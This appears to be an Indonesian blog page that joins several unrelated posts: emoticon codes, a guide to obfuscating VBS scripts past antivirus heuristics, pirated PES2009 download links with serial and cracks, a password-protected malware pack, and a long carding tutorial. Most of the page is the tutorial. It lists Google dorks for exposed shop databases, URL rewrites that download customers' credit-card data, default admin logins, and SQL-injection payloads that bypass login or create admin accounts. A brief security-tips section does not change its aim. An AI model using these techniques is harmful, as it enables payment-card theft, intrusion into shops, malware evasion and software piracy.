Latest Entries »


Karena keseringan ngeplurk dan memainkan emoticonnya hingga lebih sering lupa waktu (rock), akhirnya pada saat ngeblogging tanpa emot serasa hambar rasanya (lonely) *serasa ada yang hilang gitu*, pada dasarnya emoticon pada wordpress sebenarnya ada tetapi kode kodenya untuk tiap ekspresi emoticnnya tersebut jarang sekali diketahuit oleh para bloogers atau netters lainnya *emoticon yang paling sering muncul ialah kode “:)” *tanpa tanda kutip*, emoticon ini menunjukkan senyuman (okok)

adapun emoticon lainnya yang dapat kalian gunakan, yaitu :

*emoticon tersebut telah tersedia di wordpress kamu*


Hai sobat virologger apa kabar ?

Ok. Kamu tahukan apa itu common vbs virus heuristic ? Yup itu benar, mencari string “wscript.scriptfullname” pada file berekstensi *.vbs maupun *.vbe. Lalu bagaimanakah cara agar teknik heuristic ini di bypassing.

Tak perlu bersusah payah, karena ternyata kini telah ada software untuk mengenkripsi vbs secara keseluruhan (sekaligus dengan kode perintah script-nya) dengan metode enkripsi rotate. Sedangkan untuk membypass metode vbs emulator, coba enkripsi dua kali atau tiga kali dan empat kali juga boleh script vbs yang telah terenkripsi. Yaitu dengan VBScript ROTCryptor yang dapat kamu download di alamat download softwares pralabs:

http://www.prasetyolabs.co.cc/downloads.html.

Berikut aku experiment dengan script vbs:

MsgBox(“Hello Virologger!”)

Setelah itu klik button ROTXCrypt.

Lihatlah, bahkan perintah MsgBox dan string “Hello Virologger!” tak terlihat.
Coba buka menu Run dan klik sub menu Start.
Maka script vbs tadi akan jalan seperti berikut.

Oh yak, kalau kamu pengen acak variabelnya tinggal klik button Randomize Variable pada saat sebelum enkripsi. Quotation mark dan nilai rotated bisa diubah sesuka hati.

Sebenernya VBScript ROTCryptor tidak ditunjukan untuk memfasilitasi pembuatan malware bagi para underground karena ditunjukan dengan adanya algoritma PRAVGramming yang mencegah kamu untuk membuat malware (virus ataupun worm) vbs. Tapi bisa diakali dengan cara mendelete file pravg.cpp yang terdapat dalam folder yang sama dengan vbsrtc.exe untuk mendapatkan previlege programmer atau security tester.


pes2009logo1

PES2009 adalah seri game terbaru buatan Konami yang dibuat untuk fans olahraga sepakbola diseluruh dunia. Dimulai dari jaman SNES sampai xbox360, PS3 dan PC sekarang, game ini selalu melekat di hati para fans yang ingin memainkan “real football” dalam setiap rilisnya. Telah banyak update dan tambahan2 di seri PES yang telah membentuk game ini sebagaimana sekarang yang semakin mencerminkan sepakbola aslinya.

Thread ini dikhususkan untuk diskusi seputar PES2009, baik itu Mod dan Update terbaru atau Berita2 baru lainnya.

PC Requirement for PES2009

MINIMUM SYSTEM REQUIREMENTS:
– Windows XP SP2, Vista
– Intel Pentium 4 1.4 GHz
– 1 GiByte RAM
– 6 GB hard disk space
– GeForce FX or Radeon 9700th Pixel / Vertex Shader 2.0 and 128 MiByte VRAM.
– 800 x 600 display resolution

RECOMMENDED SYSTEM REQUIREMENTS:
– Windows XP SP2, Vista
– Intel Pentium 4 3.0 GHz
– 2 GiByte RAM
– 8 GB hard disk
– GeForce 6800 GT / GS, Radeon X1600 or higher. Pixel / Vertex Shader 3.0 and 256 MiByte VRAM
– 1,280 x 720 display resolution

DOWNLAOD GAME PES09 LOKAL FULL

http://www.indowebster.com/PES2009part01rar.html
http://www.indowebster.com/PES2009part02rar.html
http://www.indowebster.com/PES2009part03rar.html
http://www.indowebster.com/PES2009part04rar.html
http://www.indowebster.com/PES2009part05rar.html
http://www.indowebster.com/PES2009part06rar.html
http://www.indowebster.com/PES2009part07rar.html
http://www.indowebster.com/PES2009part08rar.html
http://www.indowebster.com/PES2009part09rar.html
http://www.indowebster.com/PES2009part10rar.html
http://www.indowebster.com/PES2009part11rar.html
http://www.indowebster.com/PES2009part12rar.html
http://www.indowebster.com/PES2009part13rar.html
http://www.indowebster.com/PES2009part14rar.html
http://www.indowebster.com/PES2009part15rar.html
http://www.indowebster.com/PES2009part16rar.html
http://www.indowebster.com/PES2009part17rar.html
http://www.indowebster.com/PES2009part18rar.html
http://www.indowebster.com/PES2009part19rar.html
http://www.indowebster.com/PES2009part20rar.html
http://www.indowebster.com/PES2009part21rar.html
http://www.indowebster.com/PES2009part22rar.html
http://www.indowebster.com/PES2009part23rar.html
http://www.indowebster.com/PES2009part24rar.html
http://www.indowebster.com/PES2009part25rar.html

password:

password : indowebster4ever

serial:

APVM-69N6-WW3U-UE7R-3PKM

> Konami Official patch v1.1

Patch 1.10 + krack
http://www.indowebster.com/PES_2009_110_Patch.html

> Konami Official Patch v1.2

patch 1.20
http://www.indowebster.com/PES_2009_120_Patch.html

krack for patch 1.20
http://www.indowebster.com/krack_unt…konami120.html

> KitServer (Buat PES 2009 Yg Full)

http://www.indowebster.com/Kitserver_812.html

> Cara Patch tanpa Konami update- tanpa download ke situs konami – ( untuk patch2 yang tidak compatible dengan konami update )

cara ngepatch paling maknyusss.. (diajarin bro FKmaster) – edited-

semua link download ada diatas

1. install game (yg masih perawan, jadi blum dipatch2)

2. install patch 1.10, (jangan dikrack dulu)

3. install patch 1.20

4. copy kracknya (krack yang untuk patch 1.20 , size = 27,484 mb)

5. copy folder kitserver 8.1.2 ke dalam c:\KONAMI\Pro Evolution Soccer 2009\

6. ekstrak Patch unnoficial (semisal eyination super patch v.1,burgum,dll -tergantung selera – link download patch ada dibawah)
ambil isi folder “img” yag ada di dalam patch kiserver>img
dan copy paste semuanya ke…
c:\KONAMI\Pro Evolution Soccer 2009\kitserver\img

7. cek patch di GDB letaknya di kitserver\GDB\ apakah ada isinya?
kalau ada isinya copy paste semuanya ke
c:\KONAMI\Pro Evolution Soccer 2009\kitserver\GDB

8.masuk lagi ke directory “save” copy semua isi didalamnya setelah itu paste file yang dicopy tadi ke My Documents\KONAMI\Pro Evolution Soccer 2009\save

9. Lalu kembali ke X:\KONAMI\Pro Evolution Soccer 2009\kitserver, utk menginstall kitserver dengan mengklik install di file setup.exe

> Cara nge Patch dengan Konami update (download online ke konami)

untuk patch yang sudah compatible ama update konami 1,2
by eyi (fery subagdja) sebelumnya:

– tips dari saya pastikan anda mempunyai download manager semisal IDM,dll agar download lebih cepet

– Untuk Game yang masih perawan aka baru install :

1. install game (yg masih perawan, jadi blum dipatch2)

2. install patch 1.10, (jangan dikrack dulu)

3. install patch 1.20

4. copy kracknya (krack yang untuk patch 1.20 , size = 27,484 mb)

5 Mainkan Gamenya >masuk ke system settings > download … Tunggu sampai selesai

6. setelah selesai download biar yakin coba cek (paling gampang apakah berbatov udah ada di Man United) kalau ada ya sukses lah..

7. Silahkan keluar game dan copy folder kitserver 8.1.2 ke dalam c:\KONAMI\Pro Evolution Soccer 2009\

8. ekstrak Patch unnoficial yang udah compatible (semisal eyination super patch v.2,burgum tebaru,dll -tergantung selera – link download patch ada dibawah)
ambil isi folder “img” yag ada di dalam patch kiserver>img
dan copy paste semuanya ke…
c:\KONAMI\Pro Evolution Soccer 2009\kitserver\img

9. cek patch di GDB letaknya di kitserver\GDB\ apakah ada isinya?
kalau ada isinya copy paste semuanya ke
c:\KONAMI\Pro Evolution Soccer 2009\kitserver\GDB

10.masuk lagi ke directory “save” copy semua isi didalamnya setelah itu paste file yang dicopy tadi ke My Documents\KONAMI\Pro Evolution Soccer 2009\save

11. Lalu kembali ke c:\KONAMI\Pro Evolution Soccer 2009\kitserver, utk menginstall kitserver dengan mengklik install di file setup.exe.

Kalau ada masalah(belum update sesuai yang diharapkan) coba timpa sekali lagi

untuk om engkos….


bos download di sini….. (klik di sini)

Crack and Keygen


Bagi kawan-kawan yang ingin mencari crack atau keygen silahkan
Click di sini


Ingin ngetest Antivirus anda?

gw pake A*G

tapi sebelumnya gw instal pula DeepFreeze 6…untuk mengurangi presentase terjangkit…

kan kita2 cuma mo ngetes antivirus doang…

mantab dah dari 5576 file yang “ada” 5400 file yang terdeteksi …tapi bakal gw test terus sampe update nya bisa detect semua… ga tau deh sisa file yang “ga ada” ke mana Shocked

download di sini

Password is : auToeXeCw0rm


Carding-in database memiliki dua makna.
Yang pertama adalah “Cardingin Database”.
Sedangkan yang kedua bisa berarti “Carding in (dalam) database”.

Mulai saat ini dan seterusnya, Anda akan menemukan teknik carding yang ternyata bisa dilakukan dengan begitu sederhana. Anda tidak perlu mengerti proses enkripsi mencuri password terlebih dahulu untuk bisa masuk ke sebuah situs. Dalam bab ini Anda akan mempelajari beberapa teknik yang langsung mengakses database.

Berikut ini saya berikan sebuah teknik yang bisa digunakan untuk proses carding. Anda tidak memerlukan tools, untuk melakukan hal ini. Hanya bermodalkan sebuah browser, dan membuka situs Google.

Vsproducts.mdb
Sebenarnya kalau boleh dibilang teknik ini sudah lama dan kuno. Tapi, sampai saat ini masih banyak yang bisa dicardingin. Semua itu tergantung dari kreativitas Anda.
File database yang akan dicolong adalah vsproducts.md. File ini merupakan bawaan template shopping cart ASP yang diterapkan pada sistem Microsoft Frontpage. Bagi Anda yang beruntung juga bisa menemukan nomor kartu kredit yang tidak dienkripsi. Sebab enkripsi itu sendiri bersifat optional, jadi tidak bawaan langsung, sehingga bisa langsung tampil.

Kode untuk menghubungkan database dengan file database yang digunakan adalah sebagai berikut:

sDSN=”Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=<%=server.mappath(“vsproducts.mdb”)%>;”

Sebenarnya, situs yang menerapkan model seperti ini, memiliki file test (percobaan):
http://www.situs-target.com/fpdb/test.asp

Saya harap dari penjelasan ini, pikiran negatif Anda sudah bisa bangun. Jadi, apabila Anda tidak menemukan file vsproducts.mdb langsung dari hasil searching namun menemukan link seperti di atas, patut Anda curigai. Sebab kemungkinan besar mengandung file vsproducts.mdb.
Biasanya, pesan yang muncul saat melakukan test tersebut adalah:

sDSN=”Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;”

Apabila file yang Anda jalankan adalah:
db_con_open.asp maka pesan yang muncul adalah:

<%
DIM sDSN

sDSN=”Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;”

%>

Cukup sedikit saja teorinya, kita segera saja membahas poin berikutnya. Pada bagian query Google Anda masukkan syntax:

allinurl:proddetail.asp?prod=

Sekarang Anda buka hasil searching Google tersebut, satu per satu.
Misalnya, nama situs target yang saya peroleh adalah
http://www.situs-target.com/store/proddetail.asp?prod=10001G

Saya ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb

Efek sampingnya adalah Anda bisa mendownload file database secara langsung Smile.
Dari kota dialog download tersebut klik tombol Save untuk menyimpan file database yang Anda dapatkan.
Dalam kotak dialog Save As simpan file tersebut dengan mengklik kembali tombol Save.
Tunggulah proses download dilakukan sampai selesai. Setelah selesai, klik tombol Open untuk membuka dengan aplikasi MS.Access.
Perhatikan pada hasil target yang Anda peroleh, tampak bahwa data kartu kredit ada pada tabel Orders. Tiap hasil yang Anda peroleh bisa berbeda antara situs yang satu dengan situs yang lain.

Selain itu, kita juga akan memperoleh nama administrator beserta passwordnya pada bagian Admin.
Nah, Anda sudah mendapatkan satu database pertama.
Sebagai tambahan untuk penjelasan bagian ini, saya harap Anda bisa mempermainkan folder atau directory yang terdapat di dalamnya. Masalah mempermainkan folder ini termasuk dalam bagian ilmu Google Hacking atau Google Dorks. Pada kesempatan ini cukup saya jelaskan sekilas saja.
Misalnya Anda mendapat target:
http://www.situs-target.com/store/proddetail.asp?prod=10001G

Ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
http://www.situs-target.com/fpdb/vsproducts.mdb
http://www.situs-target.com/store/vsproducts.mdb
http://www.situs-target.com/vsproducts.mdb

Tujuannya adalah untuk menemukan dimana letak file database disembunyikan.
Proses kreatif lainnya yang perlu Anda pahami adalah mengira-ngira nama file yang mirip. Hal ini sengaja saya jelaskan pada bagian awal. Sebab, jika nanti-nanti Anda sedang mencoba beraksi ternyata tidak berhasil, maka Anda harus memahami bagian ini, karena saya tidak akan menjelaskan lagi pada bagian berikutnya.
Contohnya begini, saya ambil dari kasus di atas, nama file database-nya adalah: vsproducts.mdb. Kira-kira yang mirip adalah file vsproduct.mdb (tanpa huruf s). Atau mungkin saja vspproducts.mdb, vspproduct.mdb, pokoknya pintar-pintar Anda-lah.
Walaupun hal ini kelihatannya sepele, sebenarnya dari banyak kejadian yang saya temukan banyak yang berhasil. Hal ini terjadi karena untuk mengamankan sebuah sistem, sering nama file database disamarkan, dan biasanya pula namanya hampir mirip-mirip. Contoh lainnya, ada tulisan orders, ada juga order. Bahkan beberapa kasus bersifat case sensitive, jadi apabila Anda mengetikkan Credit Card akan dianggap berbeda dibanding mengetikkan credit card.
Itulah dua poin penting yang perlu Anda pahami, supaya hasil target Anda menjadi lebih banyak. Tentu saja semua itu butuh kesabaran dan kreativitas. Sebagai bonus dari saya untuk bagian ini, adalah berikut halaman loginnya:
http://www.situs-target.com/vsadmin/admin.asp
dengan account dan password default adalah mystore dan changeme.
Seandainya Anda tidak bisa masuk dengan password default, Anda tetap masih bisa masuk menggunakan account dan password dan file database yang Anda peroleh. Smile

Shopping.mdb
Salah satu file database yang paling terkenal adalah shopping.mdb. Nama file database ini yang dibuat menggunakan MS.Access, biasanya juga terhubung dengan ASP. Berikut adalah teknik untuk mendapatkan file database tersebut yang berisikan data customer.
Seperti biasa, gunakan Google untuk mencari targetnya. Langkah detilnya sudah saya jelaskan pada bagian mencari database yang pertama, jadi saya tidak akan mengulang-ulang lagi. Maka saya hanya akan menyebutkan syntax-nya saja untuk bagian berikutnya.
Syntax: inurl:shopping.mdb
Dari link hasil searching, saya hanya perlu mendownload file databasenya. Isinya bukan hanya data kartu kredit baik customer maupun orders. Ada juga password user dan administrator di dalamnya.
Proses download bisa berbeda pada tiap orang, terutama bila menggunakan aplikasi software internet download manager yang cukup beragam dalam mendownload file database.
Saya tidak mau berpanjanglebar menjelaskan masalah teknik dan nama file secara spesifik. Saya lebih tertarik untuk mengajarkan konsepnya. Sebab dengan cara seperti itu, Anda bisa mengembangkan sendiri teknik yang diperlukan. Mengapa hal ini saya tekankan, karena nama file database bisa saja berbeda-beda. Tergantung dari nama pembuat filenya dan juga demi alasan keamanan. Sebenarnya, jika Anda mau sedikit usaha, Anda bisa memodifikasi syntax: inurl:shopping.mdb , menjadi bentuk lainnya. Dalam hal ini, saya mencoba mengubahnya menjadi:
Shopping350.mdb, shopping400.mdb, dan shopping450.mdb.
Bahkan juga ada shopping.mdb, yang berupa nama file database adalah nama situs itu sendiri. Ternyata banyak juga hasil searching yang memuaskan untuk menjadi bahan latihan carding. Ini penting bagi calon ahli webmaster yang mungkin suatu saat berminat bekerja sebagai webmaster atau penjaga keamanan situs belanja di internet.

Eipc.mdb
File database eipc.mdb adalah file default dari ProductCart. Biasanya, file ini disimpan dalam direktori productcart/database/eipc.mdb. Ada juga dari file tersebut yang mengalami proteksi password. Untuk mencari situs yang memakai sistem database ini gunakan syntax berikut untuk mencarinya di google.com
Syntax: allinurl:productcart/database/EIPC.mdb

Expire.mdb
Kalau diterjemahkan secara kasar maka expire.mdb berarti tanggal berakhirnya sebuah kartu kredit. Walau sebenarnya maksudnya bukan itu, tapi nyatanya itu tetap berhubungan dengan carding. Bingung bukan?
Sebenarnya, ini adalah file default dari CatalogIntegrator Cart; yang merupakan aplikasi e-commerce yang dijual pertama kali oleh pihak Adobe System. Aplikasi ini lebih bersifat customer friendly, dan mudah digunakan sehingga cukup banyak pihak yang tertarik untuk menggunakannya.
Syntax: inurl:expire.mdb
Sebagai tambahan saja, pada kebanyakan kasus password default untuk admin yang menggunakan expire.mdb adalah demo, dengan nama account admin adalah: admin
Halaman loginnya:
http://www.situs-target.com/Catalog/Admin/admin.asp
Perhatikan dengan benar huruf besar kecilnya pada URL supaya tidak terjadi error.
Lokasi file expire.mdb itu sendiri bisa Anda perhatikan secara cermat.
Apalagi jika seseorang bisa masuk, maka dia akan dapat melihat berbagai order pembelian dan tentu saja nomor kartu kredit terdapat di dalamnya. Tapi, saya rasa dengan mendapatkan file database-nya saja sudah cukup kok.

Products.mdb
Sebenarnya ini adalah nama file database yang cukup umum digunakan. Oleh karena ini milik umum maka isinya bisa saja bermacam-macam. Ada yang menampilkan nama produk saja dalam database. Ada pula yang menampilkan daftar order termasuk nomor kartu kredit pada konsumen.
Namun, jangan ragu jangan takut, banyak juga kok yang berisikan data konsumen. Tapi ada pula beberapa yang tidak menyertai nomor kartu kredit.
Ha…ha…ha…apa Anda bingung bacanya. Makanya lebih enakan filenya Anda download sendiri yang banyak biar jelas.
Syntax: inurl:products.mdb

Billing.mdb
File database billing.mdb ini menyimpan data kartu kredit dalam tabel Payments. Supaya lebih enak, mendingan Anda buka semua tabel dari hasil download yang Anda dapatkan. Sebab data kartu kredit tidak hanya disimpan dalam tabel Credit Cards, Orders, dan Customers. Karena bisa saja dimanipulasi oleh pembuat database, misalnya nama tabel Time (waktu), tapi isinya malah nomor kartu kredit. Dan hal ini berlaku bagi semua file database dalam buku ini. Makanya jangan cepat menyerah, tetap semangat untuk memperoleh pengalaman dan pengetahuan baru mengenai network security ini.

Shop.mdb
Berikut adalah jenis database lainnya yang sering digunakan untuk aktivitas carding. Shop.mdb, jika diterjemahkan berarti database toko, tentu saja isinya bisa komplit termasuk kartu kredit customer.
Syntax: inurl:shop.mdb
Setiap file shop.mdb yang saya temukan selalu berupa form. Jika mau, Anda juga bisa membuka dalam bentuk tabel.

Exploitshop.mdb
Dalam kesempatan ini saya tidak akan banyak berbicara mengenai exploit. Mengapa hal ini saya batasi, sebab kebanyakan exploit adalah teknik kuno yang sudah basi sehingga tidak banyak digunakan lagi. Beberapa exploit yang saya bahas dalam artikel ini, tujuan sebenarnya hanyalah untuk memberikan cara lain sebagai bentuk variasi, paling tidak untuk memberikan wawasan dan pengetahuan baru bagi Anda, terutama para calon webmaster. Dan selain itu juga sekaligus untuk membuka mata Anda supaya tahu bahwa tidak semuanya bisa langsung dengan cara mendownload database maupun file log. Masih dengan nama database yang sama, yaitu shop.mdb. Hanya saja model syntax dan teknik yang dilakukan berbeda.
Syntax: inurl:mall/lobby.asp
Dari situs target yang Anda temukan saat searching di Google, bukalah URL yang ditampilkan oleh Google. Biasanya, nama URL-nya adalah:
http://www.situs-target.com/mall/lobby.asp

Yang harus Anda lakukan adalah mengubah string
mall/lobby.asp
menjadi
fpdb/shop.mdb

Sehingga secara lengkap akan menjadi:
http://www.situs-target.com/fpdb/shop.mdb
Selanjutnya, Anda tinggal mendownload file databasenya. Data mengenai kartu kredit tersimpan pada bagian Payments (pembayaran).

Store.mdb
File database store.mdb ini adalah nama lain dari shop, juga nama lain untuk products. Walau demikian, file store.mdb ini menyimpan cukup banyak nomor kartu kredit. Dan biasanya disimpan dalam tabel Carthead.
Syntax: inurl:store.mdb

Mystore.mdb
Setelah menggunakan syntax store.mdb, berikut ini adalah model lainnya, yaitu: mystore.mdb. File database mystore.mdb ini banyak digunakan pada aplikasi shopping cart FPcartPal. Sistem ini menangani kartu kredit yang lebih aman. Sebab mereka menggunakan PayPal. Paypal adalah salah satu alat pembayaran elektronik di internet.
Syntax: inurl:mystore.mdb
Jujur saja, database ini tidaklah berisi nomor kartu kredit, sebab saya hanya ingin menunjukkan pada Anda bagaimana memodifikasi sebuah syntax. Dalam hal ini, dari store.mdb menjadi mystore.mdb. Sebenarnya, berhubungan dengan file mystore.mdb pada sistem yang sama terdapat sebuah file laporan yaitu reports.mdb. Isinya adalah laporang tentang transaksi, nggak ada kartu kreditnya. Tapi para carder biasanya memanfaatkan untuk hal lainnya. Sebab siapa tahu saja, barangkali ada file database reports.mdb yang menyimpan data kartu kredit karena bukan bagian dari produk FpcartPal, begitu pula untuk mystore.mdb.

Order.mdb
Saya rasa Anda sudah mengenal dengan jelas order.mdb yang berarti file database pemesanan. Berarti setiap pesanan akan disimpan dalam database yang satu ini. Tentu saja untuk berbelanja salah satu sarananya adalah untuk menggunakan kartu kredit.
Syntax: inurl:order.mdb

Cart.mdb
Ini dia kata-kata yang sering digunakan dalam online shop. Semua barang belanjaan di internet akan dimasukkan ke dalam cart (keranjang). Nah, seseorang bisa saja memanfaatkannya untuk melakukan aktivitas carding.
Syntax: inurl:cart.mdb
Kemungkinan lain dari database ini yang telah dimodifikasi. Misalnya, shoppingcart.mdb, shopping_cart.mdb, cart.mdb, clickcart.mdb, dan berbagai bentuk lainnya. Sesuai dengan kesukaan sang pemilik situs. Trik ini digunakan untuk mengelabui para carder supaya tidak bisa mendapatkan file mdb dengan mudah.

Scart.mdb
Serupa tapi tak sama. Itulah yang bisa saya jelaskan mengenai database scart.mdb. Ada dua model syntax yang bisa Anda coba gunakan.
allinurl:admin/scart.mdb
atau
inurl:scart.mdb
Sebenarnya model syntax ini bisa Anda modifikasi sendiri, termasuk juga untuk syntax-syntax lainnya yang terdapat dalam artikel ini. Kreatiflah mengubah syntax seperti kasus store menjadi mystore. Kalau Anda mau lebih jelas, Anda harus banyak belajar mengenai berbagai syntax google hacking (google dorks).

ExploitScart.mdb
Untuk nama database yang sama, yaitu scart.mdb, akan saya berikan sebuah exploit. Langsung saja, dengan menggunakan syntax untuk Google:
inurl:shopKart20
Bisa juga dimodifikasi menjadi “/shopKart20/”
(tanda kutip duanya tetap digunakan)
Selanjutnya Google akan menampilkan target-target empuk yang mempunyai celah keamanan yang belum sempurna. Silakan Anda buka saja. Misalnya:
http://www.situs-target.com/ashopKart20/addprod.asp
Pertama-tama hilangkan tanda string: ashopKart20 dan seterusnya. Kemudian tambahkan string:
admin/scart.mdb
Jadinya:
http://www.situs-target.com/admin/scart.mdb
Secara otomatis akan muncul pesan apakah Anda akan mendownload file database.
Anda bisa mendownload file database langsung ataupun menggunakan program pihak ketiga, misalnya internet download manager yang softwarenya banyak ditemui di internet dan bisa didownload lalu diinstal di komputer Anda.
Dalam database tersebut, nomor kartu kredit berada pada bagian orders. Sedangkan informasi pembeli berada pada bagian Customers. Sehingga nama pemilik kartu kredit bisa diketahui dari tabel customers lalu dicocokkan id-nya dengan orders.

Miscellaneous Database
Berikut ini adalah teknik untuk mendapatkan file database, yang boleh dibilang nama databasenya acak. Jadi miscellaneous bukan berarti itu adalah nama sebuah database. Sebenarnya hampir sama saja cara dan tekniknya dengan beberapa yang ada yang tadi sudah dibahas. Nama database itu bisa apa saja, misalnya toko.mdb, jual.mdb.
Akan saya suguhkan sebuah contoh kasus.
Syntax: /shop/category.asp/catid
Misalnya, Anda menemukan target dengan url:
http://www.situs-target.com/shop/category.asp?catid=37
Hapuslah shop/category.asp?catid=37 (angkanya bisa berapapun, tergantung situs target yang Anda peroleh). Kemudian ganti menjadi:
/admin/dbsetup.asp
Maka nama situsnya menjadi:
http://www.situs-target.com//admin/dbsetup.asp
Perhatikan dengan baik dan benar, garis miring (/) yang digunakan sebelum admin ada dua buah (//admin). Jadi itu bukan karena salah ketik!
Berikut adalah tampilan dua buah target yang saya temukan. Sengaja pada bagian ini saya memberikan contoh dua buah target untuk menampilkan mana file databasenya.
Misalnya dari contoh target yang pertama, nama file databasenya adalah icommerce.mdb. Sedangkan nama file database untuk situs target kedua adalah worldofwater.mdb.
Urusan download database-nya sekarang saya serahkan pada Anda supaya logika dan pikiran Anda bisa berkembang. Lagipula nama databasenya sudah ketahuan kok.

SHOPPER EXE EXPLOIT
Berikut ini syntax yang bisa dicoba:
http://www.situs-target.com/cgi-bin/shopper.exe?search=action&keywords=Dy4-VoN%2520&template=order.log

atau

http://www.situs-target.com/cgi-bin/shopper.cgi?search=action&keywords=Dy4-VoN%20&template=order.log

looding sebentar…….

Wah ternyata, banyak juga log file hasil shopping yang ditemukan….

Setelah penulis cek dan lihat hasil log file nya banyak juga cc yang masih fresh tapi tidak ada no cvv nya, hanya no pemegang kartu dan no cc dan cardExpire.

Sekali lagi, ini hanya ilmu pengetahuan dan sangat tidak disarankan untuk menyalahgunakannya.
Jika anda sebagai web master dari shopping online, tentunya anda harus lebih berhati-hati dengan teknik ini.

SECURITY TIPS (TIPS UNTUK KEAMANAN JARINGAN WEBSITE ANDA)
Khusus untuk Anda yang mengelola sebuah situs online shopping, usahakanlah untuk membuat file database yang tidak bisa diakses melalui directory public. Hindari meletakkan file database pada webroot. (Tahu kan apa yang dimaksud dengan webroot? kalau nggak tahu banyaklah membaca buku-buku tentang jaringan internet, atau bisa juga membaca-baca di wikipedia.com)
Buatlah permission untuk mengakses database pada sebuah direktori khusus, hal ini akan mencegah orang lain mendownload file database. Jangan gunakan nama database default. Ubahlah menjadi nama lainnya yang Anda rasa aman. Untuk para user, berhati-hatilah untuk berbelanja pada situs online. Carilah informasi mengenai sistem keamanan situs tersebut. Dan pastikan bahwa halaman belanja yang Anda buka bukanlah scam page, juga bukan phising.

[url]http://iptek-indonesia.blogspot.com/2008/08/credit-dtabase.html[/url]

keep laerning…..[/quote]

exmaples to learn carding….      Balas dengan kutipan
Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : http://www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log

Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/
Contoh target : http://www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem CShop

Ketik keyword google.com : allinurl:/DCShop/
Contoh : http://www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : http://www.Target.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/
Contoh : http://www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : http://www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : http://www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
http://www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/
Contoh : http://www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25′–

Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp

Ketik keyword google.com : allinurl: Lobby.asp
Contoh : http://www.Target.com/mall/lobby.asp
